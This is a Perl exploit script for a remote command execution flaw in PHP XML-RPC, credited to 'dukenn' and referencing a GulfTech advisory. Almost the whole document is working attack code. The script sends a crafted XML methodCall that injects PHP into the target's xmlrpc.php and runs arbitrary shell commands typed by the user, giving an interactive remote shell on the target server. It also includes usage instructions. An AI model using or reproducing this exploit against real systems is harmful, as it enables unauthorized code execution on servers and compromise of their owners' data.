XMLRPC remote commands execute exploit
Advisory : http://gulftech.org/?node=research&article_id=00088-07022005
#-------------------------------------------------------#
# /| #
# | | #
# | | #
# /\ ________| |___ #
# / \ \_______ __/ #
# / \|\_____ | | _ _ _ _ ()___ #
# / /\ \ ___ \ | |<_> / | | | || \ || | | | #
# / /__\ \| \ || | _ /__ |_ | | ||_/ || | |_| #
# / ______ \ | || || | / | | | || \ || | | #
# / / \ \ | || || | / |_ |_ |_|| \|| | \_| #
# \_/ |\_/ | || || | ___ _ _ #
# | | | || /| | | | | ||\/| #
# \| \||/ \| | |_ |_|| | #
# | | | || | #
# | |_ | || | #
# #
# Original advisory by http://gulftech.org/ #
# Exploit coded by dukenn (http://asteam.org) #
# #
#-------------------------------------------------------
#!/usr/bin/perl
use IO::Socket;
print "XMLRPC remote commands execute exploit by dukenn (http://asteam.org)\n";
if ($ARGV[0] && $ARGV[1])
{
$host = $ARGV[0];
$xml = $ARGV[1];
$sock = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$host", PeerPort
=> "80") || die "connecterror\n";
while (1) {
print '['.$host.']# ';
$cmd = <STDIN>;
chop($cmd);
last if ($cmd eq 'exit');
{
$xmldata = "<?xml
version=\"1.0\"?><methodCall><methodName>test.method</methodName><params><param><value><name>',''));echo
'_begin_\n';echo `".$cmd."`;echo
'_end_';exit;/*</name></value></param></params></methodCall>";
print $sock "POST ".$xml." HTTP/1.1\n";
print $sock "Host: ".$host."\n";
print $sock "Content-Type: text/xml\n";
print $sock "Content-Length:".length($xmldata)."\n\n".$xmldata;
$good=0;
while ($ans = <$sock>)
{
last if ($ans =~ /^_end_/);
if ($good == 1) { print "$ans"; }
if ($ans =~ /^_begin_/) { $good = 1; }
}
if ($good==0) {print "Exploit Failed";exit();}
}
}
}
else {
print 'Usage: perl xml.pl target.com /somescript/xmlrpc.php\n';
exit;
}